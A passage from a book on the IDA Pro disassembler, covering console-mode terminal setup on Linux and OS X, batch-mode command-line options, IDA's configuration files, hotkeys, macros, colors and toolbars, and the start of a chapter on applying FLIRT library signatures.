offers some details on how to configure various terminal types, including

remote Windows terminal clients such as SecureCRT and PuTTY.

One of the biggest challenges that you will face when using Linux termi-

nal programs is making sure that your hotkey sequences are passed all the

way to IDA and not captured by the terminal program itself. For example,

will ALT-F open IDA’s File menu or your console’s File menu? The two

options for dealing with this problem are to find a terminal program whose

hotkey sequences don’t overlap IDA’s (or that can be configured not to over-

lap) or to edit IDA’s configuration file to remap commands to hotkeys that

are not used by your terminal. If you choose to remap the hotkeys, you may

want to update the hotkey mappings on every computer on which you use

IDA so that you don’t have to remember which mapping is in effect at each

location. You may also find it difficult to interact with other IDA users who

are using the default mappings.

If you choose to use the standard Linux text display, the dimensions of

your IDA console will be fixed, and your mouse support will be dependent

on your use of GPM (the Linux console mouse server). If you are not using

GPM for mouse support, you should specify the noGPM option for TVision

when you launch IDA, as shown here:

# TVOPT=noGPM ./idal [file to disassemble]

Color choices are quite limited in console mode, and you may need to

adjust your color settings (OptionsColors) to ensure that all text is visible

and does not blend into the background. Four predefined color palettes are

available, with the option to customize the colors (a choice of 16) used for

various parts of the disassembly.

The Many Faces of IDA 193

If you are running X, then you may be running KDE’s konsole, Gnome’s

gnome-terminal, a straight xterm, or some other variation on a terminal. Other

than xterm, most terminals offer their own menus and associated hotkeys that

may or may not overlap IDA’s hotkey assignments. Consequently, xterm is not

a bad choice for running IDA, although it is not necessarily the most visually

appealing. KDE’s konsole is our preferred Linux console as it offers the best

appearance, fewest hotkey collisions, and smoothest mouse performance.

In order to address some of the problems surrounding keyboard and

mouse use within various X Windows consoles, Jeremy Cooper developed a

native X11 port2 of the TVision libraries. Using this modified version of TVi-

sion allows you to launch IDA in its own X window rather than consume an

entire console. Compiling Cooper’s TVision port yields a drop in replace-

ment for libtvision.so, the shared TVision library used by idal. After installing

the new library, you may receive an error message stating that a VGA font

can’t be loaded when you attempt to run IDA. If this happens, you will need

to install a VGA font and let your X server know where to find it. A suitable

VGA font is available at http://gilesorr.com/bashprompt/xfonts/ (download both

vga and sabvga). Another interesting feature of using the native X11 port is

that you can forward the X11 window to another machine. Thus, you can run

IDA on Linux but forward the X11 window (over ssh of course) to a Mac.

For remote access to your Linux-based IDA installation using the Hex-

Rays–supplied TVision libraries, we recommend that you configure your ter-

minal software to emulate an xterm (consult tvtuning.txt and your terminal

emulator’s documentation for more information) and then launch IDA

according to the instructions contained in tvtuning.txt. For example, you

must specify TVOPT=xtrack in order for the mouse to work with IDA when

using SecureCRT as your terminal emulator.

You can, of course, choose to export your TVOPT settings, eliminating the

need to specify them every time you launch IDA. For a full overview of avail-

able TVision options, refer to linux.cpp in the TVision source distribution.

External graph views on Linux are available from the console version

only if you happen to be running IDA in a windowing environment, and you

have configured the GRAPH_VISUALIZER variable in ida.cfg to point to a suitable

graph rendering program.3 IDA versions prior to 6.0 are only capable of gen-

erating graphs using GDL. You may install a GDL viewer such as aiSee4 and

configure IDA to launch the new application by editing IDA’s main configu-

ration file, <IDADIR>/cfg/ida.cfg. The configuration option GRAPH_VISUALIZER

specifies the command to be used to view IDA’s GDL graphs (all legacy mode

graphs). The default setting looks something like this:

GRAPH_VISUALIZER = "qwingraph.exe -remove -timelimit 10"

2. See http://simon.baymoo.org/universe/ida/tvision/.

3. Refer to “IDA Graphing” on page 176.

4. The GDL viewer aiSee is available for many platforms and is free for noncommercial use. It

can be found at http://www.aisee.de/.

194 Chapter 10

The remove option asks qwingraph to delete the input file, which is useful

when you are displaying temporary files. The timelimit option specifies the

number of seconds to spend attempting to generate a pretty graph. If the

graph cannot be laid out neatly within this time, qwingraph switches to a “fast

and ugly”5 layout algorithm. Beginning with IDA 6.0, the GRAPH_VISUALIZER

option is enclosed in a conditional block to provide separate settings for Win-

dows and non-Windows platforms. If you are editing ida.cfg on a non-Windows

platform, make sure that you are editing the correct portion of the file.

If you have installed a GDL viewer such as aiSee, then you need to edit

GRAPH_VISUALIZER to point to your viewer of choice. For a typical installation

of aiSee, this might result in the following:

GRAPH_VISUALIZER = "/usr/local/bin/aisee"

Note that it is always best to specify the full path to your GDL viewer

to ensure that it is found when IDA attempts to launch it. Finally, since

qwingraph is open source software, users of older versions of IDA are free

to download the source for qwingraph from Hex-Rays (see Chapter 9), build

it, and integrate qwingraph into their IDA installations.

OS X Console Specifics

IDA’s console versions for OS X are named the same as the Linux versions

(idal and idal64). As with the Linux and Windows console versions, the OS X

versions rely on the TVision library to support console I/O.

The fact that the Mac keyboard has a different layout than a PC keyboard

presents a few challenges when running the Mac version of IDA, primarily

because the Mac’s OPTION/ALT key does not behave like the PC’s ALT key

where application menus are concerned.

The obvious choice for attempting to run IDA is the Mac’s Terminal

application. When launching IDA using Terminal, be sure to configure the

OPTION key as an ALT key for use within IDA. Doing so allows keyboard access

to IDA ALT key shortcuts, such as all of the main IDA menus (ALT-F for the

File menu, for example). If you don’t select this option, you’ll have to use the

ESC key in lieu of ALT; thus, ESC-F brings up the File menu. Since ESC has back

or close-window functionality in IDA, this approach is not recommended.

Figure 10-1 shows the Terminal Inspector dialog, which is accessed via Ter-

minalPreferences when Terminal is active. Select the Use option key as

meta key checkbox to make the OPTION key behave as an ALT key.

One potential alternative to Terminal is iTERM,6 which allows the ALT

functionality of the OPTION key and enables mouse support as well. Another

terminal that many developers seem to like is the gnome terminal, which has

been ported7 to X11 on OS X. Since this requires the installation of XCODE

and X11, we won’t do more than mention the existence of the port. Using

the default Terminal or iTERM should be sufficient for most users.

5. See timelm.c in the wingraph32 or qwingraph source distribution.

6. See http://iterm.sourceforge.net/.

7. See http://www.macports.org/.

The Many Faces of IDA 195

An alternative way to run IDA on OS X is to install X11 (available on

your OS X installation disks as an optional package) and Jeremy Cooper’s

modified TVision library (libtvision.dylib for OS X) to run IDA as a native

X11 application. You may wish to add /usr/X11R6/bin to your system PATH

(edit PATH in /etc/profile) for easier access to X11-related binaries.

Figure 10-1: Mac OS X Terminal keyboard settings dialog

In this configuration, IDA may be launched from an xterm, and it will

execute in its own window with full mouse functionality. The problem with

the OPTION/ALT key will remain, however, as X11 views this key as Mode_switch

and fails to pass the key to IDA. Fortunately, X11 allows you to remap keys

through the use of the xmodmap utility. One solution is to create (or edit) a

file named .Xmodmap in your home directory (something like /Users/idabook/

.Xmodmap) containing the following commands:

clear Mod1

keycode 66 = Alt_L

keycode 69 = Alt_R

add Mod1 = Alt_L

add Mod1 = Alt_R

The default X11 startup script (/etc/X11/xinit/xinitrc) contains commands

to read .Xmodmap whenever you launch X11. If you have created your own

.xinitrc file, which overrides the default xinitrc, you should make sure that it

contains a command such as the following; otherwise your .Xmodmap file will

not be processed.

X xmodmap $HOME/.Xmodmap

196 Chapter 10

Finally, you need to modify the default settings for X11 to prevent the

system from overriding your modified key map. Figure 10-2 shows the X11

Preferences dialog.

Figure 10-2: X11 Preferences on OS X

To prevent the system from overriding your keyboard mappings, you

must deselect the middle option: Follow system keyboard layout. Once you

have made this change, restart X11, and your modified keyboard settings

should take effect, making the ALT key available to access IDA’s menus. You

can verify that X11 recognizes the ALT key by using xmodmap to print the cur-

rent list of keyboard modifiers, as follows:

idabook:~ idabook$ xmodmap

xmodmap: up to 2 keys per modifier, (keycodes in parentheses):

shift Shift_L (0x40), Shift_R (0x44)

lock Caps_Lock (0x41)

control Control_L (0x43), Control_R (0x46)

Y mod1 Alt_L (0x42), Alt_R (0x45)

mod2 Meta_L (0x3f)

mod3

mod4

mod5

If mod1 does not list Alt_L and Alt_R, as shown at Y, then your key map

has not been updated, in which case you should rerun the xmodmap command

listed at X in the previous code.

Using IDA’s Batch Mode

All versions of IDA can be executed in batch mode to facilitate automated

processing tasks. The primary purpose of using batch mode is to launch IDA,

have it run a specific IDC script, and have it terminate once the script com-

The Many Faces of IDA 197

pletes. Several command-line options are available to control the processing

performed during batch mode execution.

GUI versions of IDA do not require a console in order to execute, mak-

ing them very easy to incorporate into virtually any type of automation script

or wrapper program. When run in batch mode, the GUI versions of IDA do

not display any graphical components. Running the Windows console ver-

sions (idaw.exe and idaw64.exe) generates a full console display that closes

automatically when the batch processing is complete. The console display

can be suppressed by redirecting output to a null device (NUL for cmd.exe,

/dev/null in cygwin), as shown here:

C:\Program Files\Ida>idaw -B some_program.exe > NUL

IDA’s batch mode is controlled by the command-line parameters

listed here:

zThe -A option causes IDA to run in autonomous mode, which means that

no dialogs requiring user interaction will be displayed. (If you have

never clicked through IDA’s license agreement, then the license agree-

ment dialog will be displayed in spite of the presence of this switch.)

zThe -c option causes IDA to delete any existing database associated with

the file specified on the command line and generate an entirely new

database.

zThe -S option is used to specify which IDC script IDA should execute on

startup. To execute myscript.idc, the syntax is -Smyscript.idc (no space

between S and the script name). IDA searches for the named script in

the <IDADIR>/idc directory. If you have IDAPython properly installed,

you may also specify a python script here.

zThe -B option invokes batch mode and is equivalent to supplying IDA

with -A -c -Sanalysis.idc at execution. The analysis.idc script that ships

with IDA simply waits for IDA to analyze the file named on the command

line before dumping an assembly listing (.asm file) of the disassembly and

closing IDA in order to save and close the newly generated database.

The -S option is the key to batch mode, as IDA will terminate only if the

designated script causes IDA to terminate. If the script does not shut down

IDA, then all of the options simply combine to automate the IDA startup pro-

cess. Scripting with IDC is discussed in Chapter 15.

Because of limitations with the TVision library used by the Linux and OS

X versions of IDA, batch execution must be performed within a TTY console.

This makes simple things such as output redirection and background pro-

cessing impossible. Fortunately, the latest version of TVision recognizes the

TVHEADLESS environment variable, which allows console output (stdout) to be

redirected, as shown here:

# TVHEADLESS=1 ./idal –B input_file.exe > /dev/null

198 Chapter 10

Fully detaching from the console for background execution requires the

additional redirection of both stdin and stderr.

Ilfak discusses batch mode in one of his blog posts here: http://hexblog

.com/2007/03/on_batch_analysis.html. Among other things, he details how to

move beyond invoking a single script and discusses how to execute an IDA

plug-in from batch mode.

Summary

While GUI versions of IDA remain the most fully featured versions available,

console mode alternatives and batch-processing capabilities offer IDA users

tremendous flexibility in creating complex analysis solutions built around

IDA’s automated analysis capabilities.

At this point we have covered all of IDA’s basic capabilities, and it is time

to move on to more advanced features. Over the course of the next few

chapters we will cover some of IDA’s more useful configuration options and

present some additional utilities designed to improve IDA’s binary analysis

capabilities.

PART III

ADVANCED IDA USAGE

JMP

EBP

SUB

CUSTOMIZING IDA

After spending some time with IDA, you

may have developed some preferred settings

that you wish to use as defaults every time

you open a new database. Some of the options

you have changed may already carry over from session

to session, while other options seem to need resetting

every time you load a new database. In this chapter we examine the various

ways in which you can modify IDA’s behavior through configuration files and

menu-accessible options. We also examine where IDA stores various configura-

tion settings and discuss the difference between database-specific settings

and global settings.

Configuration Files

Much of IDA’s default behavior is governed by settings contained in various

configuration files. For the most part, configuration files are stored in the

<IDADIR>/cfg directory, with one notable exception being the plug-ins con-

figuration file, which resides at <IDADIR>/plugins/plugins.cfg (plugins.cfg will

202 Chapter 11

be covered in Chapter 17). While you may notice quite a few files in the main

configuration directory, the majority of the files are used by processor mod-

ules and are applicable only when certain CPU types are being analyzed. The

three principal configuration files are ida.cfg, idagui.cfg, and idatui.cfg. Options

that apply to all versions of IDA are generally found in ida.cfg, while idagui.cfg

and idatui.cfg contain options specific to the GUI versions and the text-mode

versions of IDA, respectively.

The Main Configuration File: ida.cfg

IDA’s principal configuration file is ida.cfg. Early in the startup process, this

file is read to assign default processor types for various file extensions and

to tune IDA’s memory usage parameters. Once a processor type has been

specified, the file is then read a second time to process additional configura-

tion options. The options contained in ida.cfg apply to all versions of IDA

regardless of the user interface that is being used.

General options of interest in ida.cfg include memory-tuning parameters

(VPAGESIZE), whether backup files are created (CREATE_BACKUPS), and the name

of the external graph viewer (GRAPH_VISUALIZER).

Occasionally when working with very large input fields, IDA may report

that not enough memory is available to create a new database. In such cases,

increasing the VPAGESIZE and then reopening the input file is usually sufficient

to solve the problem.

A large number of options that control the format of disassembly lines

are also contained in ida.cfg, including the default values for many of the

options accessible via OptionsGeneral. These include default values for

the number of opcode bytes to display (OPCODE_BYTES), how far instructions

should be indented (INDENTATION), whether the stack pointer offset should

be displayed with each instruction (SHOW_SP), and the maximum number

of cross-references to be displayed with a disassembly line (SHOW_XREFS).

Additional options control the format of disassembly lines while in graph

mode.

The global option specifying the maximum name length for named

program locations (as opposed to stack variables) is contained in ida.cfg and

is called MAX_NAMES_LENGTH. This option defaults to 15 characters and causes

IDA to generate a warning message any time you enter a name longer than

the current limit. The default length is kept small because some assemblers

cannot handle names longer than 15 characters. If you do not plan to run an

IDA-generated disassembly back through an assembler, then you may safely

increase the limit.

The list of characters allowed in user-assigned names is governed by the

NameChars options. By default this list allows alphanumeric characters and the

four special characters _$?@. If IDA complains about the characters that you

wish to use when you assign new names to locations or stack variables, then

you may want to add additional characters to the NameChars set. For example,

NameChars is the option to modify if you want to make the dot (.) character

legal for use in IDA names. You should avoid the use of the semicolon,

Customizing IDA 203

colon, comma, and space characters within names because they may lead to

confusion, as these characters are typically considered delimiters for various

disassembly line parts.

The last two options worth mentioning influence IDA’s behavior when

parsing C header files (see Chapter 8). The C_HEADER_PATH option specifies a

list of directories that IDA will search to resolve #include dependencies. By

default, a common directory used by Microsoft’s Visual Studio is listed. If

you use a different compiler or if your C header files are in a nonstandard

location, you should consider editing this option. The C_PREDEFINED_MACROS

option can be used to specify a default list of preprocessor macros that IDA

will incorporate regardless of whether IDA has encountered them while pars-

ing a C header file. This option offers a limited workaround facility for deal-

ing with macros that may be defined in header files to which you do not have

access.

The second half of ida.cfg contains options specific to various processor

modules. The only documentation available for options in this section of the

file comes in the form of the comments (if any) associated with each option.

The processor-specific options specified in ida.cfg generally dictate the

default settings in the Processor options section of IDA’s initial file-loading

dialog.

The last step in processing ida.cfg is to search for a file named <IDADIR>/

cfg/idauser.cfg. If present,1 this file is treated as an extension of ida.cfg, and any

options in the file will override corresponding options in ida.cfg. If you do

not feel comfortable editing ida.cfg, then you should create idauser.cfg and

add to it all of the options that you wish to override. In addition, idauser.cfg

offers the easiest means for transferring your customized options from one

version of IDA to another. For example, with idauser.cfg you do not need to

re-edit ida.cfg each time you upgrade your copy of IDA. Instead, simply copy

your existing idauser.cfg to your new IDA installation any time you upgrade.

The GUI Configuration File: idagui.cfg

Configuration items specific to the GUI version of IDA are located in their

own file: <IDADIR>/cfg/idagui.cfg. This file is organized into roughly three

sections: default GUI behaviors, keyboard hotkey mappings, and file exten-

sion configuration for the FileOpen dialog. In this section we discuss a few

of the more interesting options. Consult idagui.cfg for the complete list of

available options, which in most cases are accompanied by comments describ-

ing their purpose.

The Windows GUI version of IDA allows a secondary help file to be spec-

ified using the HELPFILE option. Any file specified here does not replace IDA’s

primary help file. The intended purpose of this option is to provide access to

supplemental information that may apply in specific reverse engineering sit-

uations. When a supplemental help file is specified, CTRL-F1 causes IDA to

open the named file and search for a topic that matches the word under the

cursor. If no match is found, then you are taken to the help file’s index. As

1. This file does not ship with IDA. Users must generate this file on their own if they wish IDA to

find it.

204 Chapter 11

an example, unless you count auto comments, IDA does not offer any help

information regarding the instruction mnemonics in a disassembly. If you

are analyzing an x86 binary, you might like to have an x86 instruction refer-

ence available on command. If you can locate a help file that happens to con-

tain topics for each x86 instruction,2 then help for any instruction is only a

hotkey away. The only word of caution concerning supplemental help files

is that IDA supports only the older WinHelp-style help files (.hlp). IDA does

not support the use of compiled HTML help files (.chm) as secondary help

files.

NOTE Microsoft Windows Vista and later do not provide native support for 32-bit WinHelp

files because the WinHlp32.exe file does not ship with these operating systems. Please

refer to Microsoft Knowledge Base article 9176073 for more information.

A common question asked about using IDA is “How can I patch binaries

using IDA?” In a nutshell, the answer is “You can’t,” but we will put off dis-

cussing the details of this issue until Chapter 14. What you can do with IDA is

patch the database to modify instructions or data in almost any way you see

fit. Once we discuss scripting (Chapter 15), you will understand that modify-

ing the database is not terribly difficult. But what if you are not interested

in or not ready to learn IDA’s scripting language? IDA contains a database-

patching menu that is not shown by default. The DISPLAY_PATCH_SUBMENU option

is used to show or hide IDA’s patching menu, which shows up as EditPatch

Program. The options available on this menu are discussed in Chapter 14.

The single-line input box at the bottom of your IDA workspace is known

as the IDA comand line. You can use the DISPLAY_COMMAND_LINE option to

control whether this field is displayed or not. By default the command will

be shown. If you are tight on screen space and you don’t anticipate the need

to enter one-line scripts, then turning this feature off can help you regain a

small amount of room in your IDA display. Note that this command line does

not allow you to execute operating system commands as if you were entering

them at a command prompt.

The hotkey configuration section of idagui.cfg is used to specify mappings

between IDA actions and hotkey sequences. Hotkey reassignment is useful

in many instances, including making additional commands available via hot-

keys, changing default sequences to sequences that are easier to remember,

or changing sequences that might conflict with other sequences in use by the

operating system or your terminal application (useful primarily for the console

version of IDA).

Virtually every option that IDA makes available through menu items

or toolbar buttons is listed in this section. Unfortunately, the names of the

commands tend not to match the text used on IDA’s menus, so it may take

some effort to determine exactly which configuration file option maps to a

specific menu option. For example, the JumpJump to Problem command

equates to the JumpQ option (which does happen to match its hotkey: CTRL-Q)

in idagui.cfg. In addition, while many commands have matching comments to

2. Pedram Amini swears by this WinHelp32 file: http://pedram.redhive.com/openrce/opcodes.hlp.

3. See http://support.microsoft.com/kb/917607.

Customizing IDA 205

describe their purpose, many commands have no description at all, so you

are left to determine the behavior of a command based on its name within

the configuration file. A trick that may help you figure out what menu item

a configuration file action is associated with is to search for the action in IDA’s

help system. The results of such searches usually lead to the description of

the action’s corresponding menu item.

The following lines represent example hotkey assignments in idagui.cfg:

"Abort" = 0 // Abort IDA, don't save changes

"Quit" = "Alt-X" // Quit to DOS, save changes

The first line is the hotkey assignment for IDA’s Abort command, which

in this case has no hotkey assignment. The unquoted value 0 indicates that

no hotkey has been assigned to a command. The second line shows the hot-

key assignment for IDA’s Quit action. Hotkey sequences are specified as a

quoted string naming the key sequence. Numerous examples of hotkey

assignments exist within idagui.cfg.

The final portion of idagui.cfg associates file type descriptions with their

associated file extensions and specifies which file types will be listed in the

Files of type drop-down list within the FileOpen dialog. A large number of

file types are already described in the configuration file; however, if you find

yourself frequently working with a file type that is not available, you may want

to edit the file types list to add your file type to the list. The FILE_EXTENSIONS

option describes all file associations known to IDA. The following line is an

example of a typical file type association.

CLASS_JAVA, "Java Class Files", "*.cla*;*.cls"

The line contains three comma-separated components: a name for the

association (CLASS_JAVA), a description, and a filename pattern. Wildcards are

allowed in the filename pattern, and multiple patterns can be specified by

using a semicolon to separate them. A second type of file association allows

several existing associations to be grouped into a single category. For example,

the following line groups all associations whose names begin with EXE_ into a

single association named EXE.

EXE, "Executable Files", EXE_*

Note that the pattern specifier in this case is not quoted. We might

define our own file association as follows:

IDA_BOOK, "Ida Book Files", "*.book"

206 Chapter 11

We can choose any name we like for the association as long as it is not

already in use; however, simply adding a new association to the FILE_EXTENSIONS

list is not sufficient to make that association appear in the FileOpen dialog.

The DEFAULT_FILE_FILTER option lists the names of all associations that will

appear in the FileOpen dialog. To complete the process and make our new

association available, we would need to add IDA_BOOK to the DEFAULT_FILE_FILTER

list. Similar to the idauser.cfg file, the last line in idagui.cfg contains a directive to

include a file named <IDADIR>/cfg/idauserg.cfg. If you do not feel comfortable

editing idagui.cfg, then you should create idauserg.cfg and add to it all of the

options that you wish to override.

The Console Configuration File: idatui.cfg

The analog to idagui.cfg for users of the console version of IDA is <IDADIR>/

cfg/idatui.cfg. This file is very similar in layout and functionality to idagui.cfg.

Among other things, hotkey specifications are made in the exact same manner

as they are in idagui.cfg. Because the two files are so similar, we will detail only

the differences here.

First, the options DISPLAY_PATCH_SUBMENU and DISPLAY_COMMAND_LINE are

not available in the console version and are not included in idatui.cfg. The

FileOpen dialog used in the console version is far simpler than the dialog

used in the GUI version, so all of the file association commands available in

idagui.cfg are missing in idatui.cfg.

On the other hand, a few options are available only for console versions

of IDA. For example, you can use the NOVICE option to have IDA start in a

beginner mode, in which it disables some of its more complex functionality

in an attempt to be easier to learn. A notable difference in novice mode is

the almost complete lack of subviews.

Console users are far more likely to rely on the use of hotkey sequences.

To facilitate the automation of common hotkey sequences, console mode

IDA provides a keyboard macro definition syntax. Several example macros

can be found in idatui.cfg; however, the ideal location to place any macros

that you develop is <IDADIR>/cfg/idausert.cfg (the console equivalent of

idauserg.cfg). A sample macro contained in the default idatui.cfg might look

like the following (in the actual idatui.cfg, this macro is commented out):

X MACRO Y"Alt-H" // this sample macro jumps to "start" label

{

"G"

's' 't' 'a' 'r', 't'

"Enter"

}

Customizing IDA 207

Macro definitions are introduced with the MACRO keyword X followed by

the hotkey Y to be associated with the macro. The macro sequence itself is

specified between braces as a sequence of key name strings or characters,

which may in turn represent hotkey sequences themselves. The preceding

example macro, activated using ALT-H, opens the Jump to Address dialog

using the G hotkey, enters the label start into the dialog one character at a

time, and then closes the dialog using the ENTER key. Note that we could not

use the syntax “start” to enter the name of the symbol, as this would be taken

as the name of a hotkey and result in an error.

NOTE Macros and novice mode are not available in the GUI version of IDA.

As a final note about configuration file options, it is important to know

that if IDA encounters any errors while parsing its configuration files, it

immediately terminates with an error message that attempts to describe the

nature of the problem. It is not possible to start IDA until the error condition

has been corrected.

Additional IDA Configuration Options

IDA has a tremendous number of additional options that must be configured

through the IDA user interface. Options for formatting individual disassembly

lines were discussed in Chapter 7. Additional IDA options are accessed via

the Options menu, and in most cases, any options that you modify apply only

to the currently opened database. Values for those options are stored in the

associated database file when the database is closed. IDA’s Color (Options

Colors) and Font (OptionsFont) options are two of the exceptions to this

rule in that they are global options that, once set, remain in effect in all future

IDA sessions. For Windows versions of IDA, option values are stored in the

Windows registry under the HKEY_CURRENT_USER\Software\Hex-Rays\IDA registry

key. For non-Windows versions of IDA, these values are stored in your home

directory in a proprietary format file named $HOME/.idapro/ida.reg.

Another piece of information that is saved in the registry concerns dialogs

for which you may choose the Do not display this dialog box again option.

This message occasionally appears in the form of a checkbox in the lower-

right portion of some informational message dialogs that you may not wish

to see in the future. Should you select this option, a registry value is created

under the HKEY_CURRENT_USER\Software\Hex-Rays\IDA\Hidden Messages registry

key. If, at a later time, you wish to have a hidden dialog displayed once again,

you will need to delete the appropriate value under this registry key.

IDA Colors

The color of virtually every item in an IDA display can be customized via the

OptionsColors dialog shown in Figure 11-1.

208 Chapter 11

Figure 11-1: The color selection dialog

The Disassembly tab controls the colors used for various parts of each line

in the disassembly window. Examples of each type of text that can appear in a

disassembly are given in the example window X. When you select an item in

the example window, the item’s type is listed at Y. Using the Change Color

button, you may assign any color you wish to any item you wish.

The color selection dialog contains tabs for assigning colors used in the

navigation band, the debugger, the jump arrows in the left margin of the text

disassembly view, and various components in the graph view. Specifically, the

Graph tab controls the coloring of graph nodes, their title bars, and the edges

that connect each node, while the Disassembly tab controls the coloring of

disassembled text in the graph view. The Misc tab allows for customizing the

colors used in IDA’s message window.

Customizing IDA Toolbars

In addition to menus and hotkeys, the GUI version of IDA offers a large

number of toolbar buttons spread across more than two dozen toolbars.

Toolbars are typically docked in the main toolbar area beneath IDA’s menu

bar. Two predefined toolbar arrangements accessible using the View

Toolbars menu are Basic mode, which enables seven of IDA’s toolbars, and

Advanced mode, which enables every IDA toolbar. Individual toolbars can be

detached, dragged, and relocated to any location on the screen to suit your

personal taste. If you find that you have no need for a particular toolbar, you

can remove it from the display entirely via the ViewToolbars menu, which

is shown in Figure 11-2.

This menu also appears if you right-click anywhere within the docking

area of the IDA display. Turning off the Main toolbar removes all toolbars

from the docking area and is useful if you need to maximize the amount

of screen space dedicated to the disassembly window. Any changes that you

make to your toolbar arrangement are stored with the current database.

Customizing IDA 209

Opening a second database will restore the toolbars to the arrangement that

was in effect when the second database was last saved. Opening a new binary to

create a new database restores the toolbar arrangement based on IDA’s cur-

rent default toolbar settings.

Figure 11-2: The toolbar configuration menu

If you settle on a toolbar arrangement that you happen to like and wish

to make it the default, then you should save the current desktop arrangement

as your default desktop using WindowsSave Desktop, which opens the

dialog shown in Figure 11-3.

Figure 11-3: The Save Disassembly

Desktop dialog

Each time you save a desktop configuration, you are asked to supply a

name for the configuration. When the Default checkbox is selected, the

current desktop layout becomes the default for all new databases and the

desktop to which you will revert if you choose WindowsReset desktop. To

restore the display to one of your custom desktops, select WindowsLoad

Desktop and choose the named layout that you wish to load. Saving and

restoring desktops is particularly useful in situations that involve using mul-

tiple monitors with different sizes and/or resolutions (which may be com-

mon with laptops using different docking stations or when connecting

to projectors for presentations).

210 Chapter 11

Summary

When starting out with IDA, you may be perfectly satisfied with both its

default behaviors and its default GUI layout. As you become more comfort-

able with IDA’s basic features, you are certain to find ways to customize IDA

to your particular tastes. While there is no way to provide complete coverage

of every possible option IDA offers in a single chapter, we have attempted

to provide pointers to the principal locations in which those options may be

found. We have also attempted to highlight those options that you are most

likely to want to manipulate at some point in your IDA experience. Discover-

ing additional useful options is left as a matter of exploration for inquisitive

readers.

JMP

EBP

SUB

LIBRARY RECOGNITION USING

FLIRT SIGNATURES

At this point it is time to start moving

beyond IDA’s more obvious capabilities

and begin our exploration of what to do after

“The initial autoanalysis has been finished.”1 In

this chapter we discuss techniques for recognizing

standard code sequences such as the library code con-

tained in statically linked binaries or standard initializa-

tion and helper functions inserted by compilers.

When you set out to reverse engineer any binary, the last thing that

you want to do is waste time reverse engineering library functions whose

behavior you could learn much more easily simply by reading a man page,

reading some source code, or doing a little Internet research. The challenge

presented by statically linked binaries is that they blur the distinction between

application code and library code. In a statically linked binary, entire libraries

1. IDA generates this message in the Output window when it has finished its automated

processing of a newly loaded binary.

212 Chapter 12

are combined with application code to form a single monolithic executable

file. Fortunately for us, tools are available that enable IDA to recognize and

mark library code, allowing us to focus our attention on the unique code

within the application.

Fast Library Identification and Recognition Technology

Fast Library Identification and Recognition Technology, better known as

FLIRT,2 encompasses the set of techniques employed by IDA to identify

sequences of code as library code. At the heart of FLIRT are pattern-matching

algorithms that enable IDA to quickly determine whether a disassembled

function matches one of the many signatures known to IDA. The <IDADIR>/sig

directory contains the signature files that ship with IDA. For the most part,

these are libraries that ship with common Windows compilers, though a few

non-Windows signatures are also included.

Signature files utilize a custom format in which the bulk of the signature

data is compressed and wrapped in an IDA-specific header. In most cases,

signature filenames do not clearly indicate which library the associated sig-

natures were generated from. Depending on how they were created, signature

files may contain a library name comment that describes their contents. If we

view the first few lines of extracted ASCII content from a signature file, this

comment is often revealed. The following Unix-style command3 generally

reveals the comment in the second or third line of output:

# strings sigfile | head -n 3

Within IDA, there are two ways to view comments associated with signature

files. First, you can access the list of signatures that have been applied to a

binary via ViewOpen SubviewsSignatures. Second, the list of all signature

files is displayed as part of the manual signature application process, which is

initiated via FileLoad FileFLIRT Signature File.

Applying FLIRT Signatures

When a binary is first opened, IDA attempts to apply special signature files,

designated as startup signatures, to the entry point of the binary. It turns

out that the entry point code generated by various compilers is sufficiently

unique that matching entry point signatures is a useful technique for iden-

tifying the compiler that may have been used to generate a given binary.

2. See http://www.hex-rays.com/idapro/flirt.htm.

3. The strings command was discussed in Chapter 2, while the head command is used to view

only the first few lines (three in the example) of its input source.

Library Recognition Using FLIRT Signatures 213

If IDA identifies the compiler used to create a particular binary, then the

signature file for the corresponding compiler libraries is loaded and applied

to the remainder of the binary. The signatures that ship with IDA tend to

be related to proprietary compilers such as Microsoft Visual C++ or Borland

Delphi. The reason behind this is that a finite number of binary libraries ship

with these compilers. For open source compilers, such as GNU gcc, the binary

variations of the associated libraries are as numerous as the operating systems

the compilers ship with. For example, each version of FreeBSD ships with

a unique version of the C standard library. For optimal pattern matching,

signature files would need to be generated for each version of the library.

Consider the difficulty in collecting every variation of libc.a4 that has shipped

with every version of every Linux distribution. It simply is not practical. In part,

these differences are due to changes in the library source code that result

in different compiled code, but huge differences also result from the use

of different compilation options, such as optimization settings and the use of

different compiler versions to build the library. The net result is that IDA

ships with very few signature files for open source compiler libraries. The good

news, as you shall soon see, is that Hex-Rays makes tools available that allow

you to generate your own signature files from static libraries.

So, under what circumstances might you be required to manually apply

signatures to one of your databases? Occasionally IDA properly identifies

the compiler used to build the binary but has no signatures for the related

compiler libraries. In such cases, either you will need to live without signatures,

or you will need to obtain copies of the static libraries used in the binary and

generate your own signatures. Other times, IDA may simply fail to identify

a compiler, making it impossible to determine which signatures should be

4. libc.a is the version of the C standard library used in statically linked binaries on Unix-style

systems.

MAIN VS. _START

Recall that a program’s entry point is the address of the first instruction that will be

executed. Many longtime C programmers incorrectly believe that this is the address

of the function named main, when in fact it is not. The file type of the program, not

the language used to create the program, dictates the manner in which command-

line arguments are provided to a program. In order to reconcile any differences

between the way the loader presents command-line arguments and the way the pro-

gram expects to receive them (via parameters to main, for example), some initializa-

tion code must execute prior to transferring control to main. It is this initialization that

IDA designates as the entry point of the program and labels _start.

This initialization code is also responsible for any initialization tasks that must

take place before main is allowed to run. In a C++ program, this code is responsible

for ensuring that constructors for globally declared objects are called prior to execu-

tion of main. Similarly, cleanup code is inserted that executes after main completes

in order to invoke destructors for all global objects prior to the actual termination of

the program.

214 Chapter 12

applied to a database. This is common when analyzing obfuscated code in

which the startup routines have been sufficiently mangled to preclude com-

piler identification. The first thing to do, then, would be to de-obfuscate

the binary sufficiently before you could have any hope of matching library

signatures. We will discuss techniques for dealing with obfuscated code in

Chapter 21.

Regardless of the reason, if you wish to manually apply signatures to a

database, you do so via FileLoad FileFLIRT Signature File, which opens

the signature selection dialog shown in Figure 12-1.

Figure 12-1: FLIRT signature selection

The File column reflects the name of each .sig file in IDA’s <IDADIR>/sig

directory. Note that there is no means to specify an alternate location for .sig

files. If you ever generate your own signatures, they need to be placed into

<IDADIR>/sig along with every other .sig file. The Library name column dis-

plays the library name comment that is embedded within each file. Keep in

mind that these comments are only as descriptive as the creator of the signa-

tures (which could be you!) chooses to make them.

When a library module is selected, the signatures contained in the cor-

responding .sig file are loaded and compared against every function within

the database. Only one set of signatures may be applied at a time, so you

will need to repeat the process if you wish to apply several different signature

files to a database. When a function is found to match a signature, the func-

tion is marked as a library function, and the function is automatically renamed

according to the signature that has been matched.

